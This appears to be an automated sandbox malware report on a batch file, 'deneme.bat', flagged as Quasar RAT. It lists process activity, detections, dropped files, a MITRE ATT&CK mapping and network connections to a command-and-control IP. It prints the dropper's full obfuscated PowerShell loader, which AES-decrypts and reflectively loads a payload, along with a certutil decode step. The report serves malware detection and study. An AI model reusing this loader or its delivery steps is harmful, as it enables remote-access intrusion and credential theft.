          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lilxn = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\allah.bat').split([environment]::newline);foreach ($vohpq in $lilxn) { if ($vohpq.startswith(':: ')) { $ohwzk = $vohpq.substring(3); break; }; };$pphgd = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($ohwzk);$ygmef = new-object system.security.cryptography.aesmanaged;$ygmef.mode = [system.security.cryptography.ciphermode]::cbc;$ygmef.padding = [system.security.cryptography.paddingmode]::pkcs7;$ygmef.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('6pnvywetf4chawo/pebnarz3xrlewmbpf3oumgmdvww=');$ygmef.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('lxqslbfdvl0gyevxt5ivjg==');$blbua = $ygmef.createdecryptor();$pphgd = $blbua.transformfinalblock($pphgd, 0, $pphgd.length);$blbua.dispose();$ygmef.dispose();$mkymi = new-object system.io.memorystream(, $pphgd);$wtlbu = new-object system.io.memorystream;$jexhz = new-object system.io.compression.gzipstream($mkymi, [io.compression.compressionmode]::decompress);$jexhz.copyto($wtlbu);$jexhz.dispose();$mkymi.dispose();$wtlbu.dispose();$pphgd = $wtlbu.toarray();$wewpp = [system.reflection.assembly]::('daol'[-1..-4] -join '')($pphgd);$bdlvj = $wewpp.entrypoint;$bdlvj.invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected Quasar RAT
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Quasar RAT
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Windows Management Instrumentation          		Path Interception11
          Process Injection          		1
          Masquerading          		OS Credential Dumping121
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Command and Scripting Interpreter          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Scripting          		Logon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion          		Security Account Manager41
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell          		Logon Script (Mac)Logon Script (Mac)11
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Scripting          		LSA Secrets22
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Hidden Files and Directories          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Obfuscated Files or Information          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          deneme.bat8%ReversingLabsText.Malware.Generic
          deneme.bat17%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\allah.bat100%AviraTR/Dldr.Malnote.U
          C:\Users\user\AppData\Local\Temp\allah.bat.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\allah.bat.exe0%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          74.234.104.2360%Avira URL Cloudsafe
          https://ipwho.is/0%VirustotalBrowse
          https://go.microsoft.cot0%Avira URL Cloudsafe
          https://ipwho.is/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          74.234.104.236true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.ipify.org/allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://nuget.org/NuGet.exeallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://stackoverflow.com/q/14436606/23354allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.633628598.0000020E518B2000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngallah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlallah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.microallah.bat.exe, 00000004.00000002.633628598.0000020E520F9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://stackoverflow.com/q/11564914/23354;allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://stackoverflow.com/q/2152978/23354allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exeallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licenseallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://ipwho.is/allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameallah.bat.exe, 00000004.00000002.633628598.0000020E50D01000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterallah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.microsoft.cotallah.bat.exe, 00000004.00000002.677997205.0000020E68E86000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            74.234.104.236
                            		unknownUnited States
                            		7018ATT-INTERNET4UStrue

                            General Information

                            Joe Sandbox Version:37.1.0 Beryl
                            Analysis ID:876996
                            Start date and time:2023-05-28 09:33:54 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:deneme.bat
                            Detection:MAL
                            Classification:mal100.troj.evad.winBAT@8/6@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .bat

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            09:34:54API Interceptor43x Sleep call for process: allah.bat.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            File Type:data
                            Category:modified
                            Size (bytes):9432
                            Entropy (8bit):4.918232018284106
                            Encrypted:false
                            SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
                            MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
                            SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
                            SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
                            SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lws4mod0.ycy.ps1

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwf14wkq.feb.psm1

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\allah.bat

                            Download File
                            Process:C:\Windows\System32\certutil.exe
                            File Type:DOS batch file, ASCII text, with very long lines (59710), with CRLF line terminators
                            Category:dropped
                            Size (bytes):1656310
                            Entropy (8bit):6.015691015837739
                            Encrypted:false
                            SSDEEP:24576:2XSg2xeZeRalJecyKKAkS7Nr2C5Uz7yYmdAC8cywn+H8b/7KdxinkWrrMt:QSFQlC+92kKMh+yQRr
                            MD5:EAE03E33CC6A6DA5B23F9508133E453C
                            SHA1:1BEF2A1688C72A0A29B6CA6D378D57BB718DBBB7
                            SHA-256:5642778FEF03F7E81A81BB97A3C33D0B569479C65B556EB1CDAE50108BBC8A14
                            SHA-512:95A20A2A89D5910B0FABBCC0B96FCDFCC34BA226D076E17F65DBF7AED0C7FB1DBE7819FE1EEE3265ED1988F1075F614701B2195E65ABA9575D8E810DC29302D1
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Preview:@echo off..set "FVGr=set "..%FVGr%"diFAUFtRMb=st"..%FVGr%"HYrJXVYKMt=\v"..%FVGr%"yTBTwAtjPl=rs"..%FVGr%"JrIRTfruLx=ll"..%FVGr%"AcCxjzbNLa=e""..%FVGr%"uimqsJPnna=ws"..%FVGr%"fskjreOFIf=xe"..%FVGr%"BGqwyrxSRT=y "..%FVGr%"RQIVpdMYql=s\"..%FVGr%"JZYSrIliaK=\W"..%FVGr%"pKmrDtKJRu=ow"..%FVGr%"jokylzBZud=po"..%FVGr%"dteNOHluqU=ex"..%FVGr%"JNfEJZoVMF=em"..%FVGr%"LJuCjkXTHo=he"..%FVGr%"NiiSpBZPeO=we"..%FVGr%"wGRWikxUyZ="%~0."..%FVGr%"SOXgWNFsbQ=do"..%FVGr%"OfUcUhdoKk=Po"..%FVGr%"yirSNeGyTS=1."..%FVGr%"XpRSEUcRWD=we"..%FVGr%"MDGcYykQUG=co"..%FVGr%"dSgkpBIVWS=rS"..%FVGr%"blAcMgKKLZ=Sy"..%FVGr%"pFjqvtxWZA=Wi"..%FVGr%"NulBLqNrbK=.e"..%FVGr%"DfiQlRPLOE= /"..%FVGr%"CHdPeSYMSs=ll"..%FVGr%"JWoMEzizDC= C"..%FVGr%"dAMuPrdcZj=:\"..%FVGr%"KVlpBngVtN=in"..%FVGr%"xSIsYMTVlO=he"..%FVGr%"dpDmydkkFw=32"..%FVGr%"UwdGMUTIeF=py"..%FVGr%"QXQbIPoUxz=nd"..%FVGr%"bhFhUMkpqk=0\"..set "GpeR=set "..%GpeR%"tYMoAFPNXc=cd"..%GpeR%"XygUUDuQwo= "%~dp0""..set "AZSJ=set "..%AZSJ%"wObaReDTXA=GD);"..%AZSJ%"qWkGXtcWHU=Secu"..%AZSJ

                            C:\Users\user\AppData\Local\Temp\allah.bat.exe

                            Download File
                            Process:C:\Windows\System32\cmd.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):447488
                            Entropy (8bit):5.440627434620499
                            Encrypted:false
                            SSDEEP:6144:f1eapvqlkiMWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:NzW2KXzJ4pdd3klnnWosPhnzq
                            MD5:95000560239032BC68B4C2FDFCDEF913
                            SHA1:1B3B40FBC889FD4C645CC12C85D0805AC36BA254
                            SHA-256:D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
                            SHA-512:F990F72F4D90CE49F7A44DA0C0CDD82D56A7DC7461E073646ACFD448379B2ADEFD6E29FB2A596A9C8819DE53FA709905C98007B70DD4CF98569373013E42EE49
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................G.......G.............................................+...........Rich............................PE..d....)............"..........P...... 2.........@..........................................`.......... ......................................|@.......p...}...`..................0...P...T.......................(....................................................text.............................. ..`.rdata..............................@..@.data...8....P.......<..............@....pdata.......`.......B..............@..@.rsrc....}...p...~...L..............@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

                            \Device\Null

                            Download File
                            Process:C:\Windows\System32\certutil.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):100
                            Entropy (8bit):4.859079570624175
                            Encrypted:false
                            SSDEEP:3:qOYFXXmxNVEM+YFUiWUSRwqRF8jxd1ELzdUA2AGN8cv:q3lUdnuiW9gxILxUANGN8e
                            MD5:FA1FF6A8138C97A5B875A45881B15AC1
                            SHA1:09BC1EE3F39C5A4B2DD9CB8B5AC853E0E277FECE
                            SHA-256:C3BE4668A60432076884B0ECC8941E2C9F016813ABEBFB9BE0ADDC3376C60E96
                            SHA-512:415A63EFB1E304DBF1D6B5035AB6024C7932051EF7638BE75A4AD0E9163A4959703C0F3A4AAA019F7C2531BA4F1A17FDCBE7FAE13FDB1131D3B99D289853D975
                            Malicious:false
                            Preview:Input Length = 2277691..Output Length = 1656310..CertUtil: -decode command completed successfully...

                            Static File Info

                            General

                            File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                            Entropy (8bit):5.697442564532801
                            TrID:
                            • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                            • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                            • MP3 audio (1001/1) 18.19%
                            File name:deneme.bat
                            File size:2277691
                            MD5:140518164b4e215675accd37cae0d91f
                            SHA1:605f1798f9b54b245e35ea516c6e3818463953a7
                            SHA256:3411ad812be09efa84946389ddf8fcbc2c1faa7aec4fd419fe02ec748f746abb
                            SHA512:a0210e5147d4e1cda815d4cab29a82f1dd221fd43456d4d9a18ebe1761c90aa31d48f7aca111510dedb2001ef125fb8226634aa3db7fcbfca57a7d5f389a8052
                            SSDEEP:24576:dr8+hKEEFki/cKQSMavHgz6kMtQCJQ5HT0/xBBX0T+DewGEpwERNey20cUIz9Chg:dryEE7kMRy+DeOFYT0hTg+js
                            TLSH:1CB5022541983FE9CB58673CF079320E57F4158B4A65628EAB63EE06BFF6C080D274B5
                            File Content Preview:..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\allah.bat" >nul 2>&1 ..cls.."%Temp%\allah.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpzZXQgI

                            File Icon

                            Icon Hash:9686878b929a9886

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 28, 2023 09:35:08.256187916 CEST497023131192.168.2.374.234.104.236
                            May 28, 2023 09:35:11.263130903 CEST497023131192.168.2.374.234.104.236
                            May 28, 2023 09:35:17.263669014 CEST497023131192.168.2.374.234.104.236
                            May 28, 2023 09:35:32.719080925 CEST497033131192.168.2.374.234.104.236
                            May 28, 2023 09:35:35.718307972 CEST497033131192.168.2.374.234.104.236
                            May 28, 2023 09:35:41.722459078 CEST497033131192.168.2.374.234.104.236
                            May 28, 2023 09:35:57.330818892 CEST497043131192.168.2.374.234.104.236
                            May 28, 2023 09:36:00.345535040 CEST497043131192.168.2.374.234.104.236
                            May 28, 2023 09:36:06.361524105 CEST497043131192.168.2.374.234.104.236
                            May 28, 2023 09:36:21.668445110 CEST497053131192.168.2.374.234.104.236
                            May 28, 2023 09:36:24.683211088 CEST497053131192.168.2.374.234.104.236
                            May 28, 2023 09:36:30.683803082 CEST497053131192.168.2.374.234.104.236
                            May 28, 2023 09:36:46.357554913 CEST497063131192.168.2.374.234.104.236
                            May 28, 2023 09:36:49.372786045 CEST497063131192.168.2.374.234.104.236
                            May 28, 2023 09:36:55.389588118 CEST497063131192.168.2.374.234.104.236

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior
